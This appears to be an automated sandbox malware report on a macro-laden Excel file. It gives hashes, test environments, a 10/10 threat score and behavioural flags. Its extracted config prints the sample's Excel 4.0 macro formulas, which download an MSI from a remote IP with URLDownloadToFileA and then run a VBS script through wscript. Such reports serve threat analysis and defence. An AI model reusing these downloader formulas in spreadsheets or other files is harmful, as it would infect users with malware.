General
-
Target
f6e90af5e9bec267c8aab9d3962be463
-
Size
6KB
-
Sample
231222-t61xnahhgk
-
MD5
f6e90af5e9bec267c8aab9d3962be463
-
SHA1
7f7d5d691148e44815dd46d6286f3befa9acba97
-
SHA256
2e5fa0a8e3d718fd20cd2fea531ac3a40ca19c4a97b30943ef46c6b5da00753b
-
SHA512
eb42d7ec3097ca2eacbc816a7fee7c26df88037fabfd4b87550c041a76d74df254551d898c97935c42e67e7bff794b42bdf80dd2713dbebeaf896ce0b694a09e
-
SSDEEP
192:NDS1uSnbrA2OmmfRe8UhHFBFYu4b98y/v+kw:NCuUM2wc1FY9b98y/2
Static task
static1
Behavioral task
behavioral1
Sample
f6e90af5e9bec267c8aab9d3962be463.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
f6e90af5e9bec267c8aab9d3962be463.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
-
-
Target
f6e90af5e9bec267c8aab9d3962be463
-
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-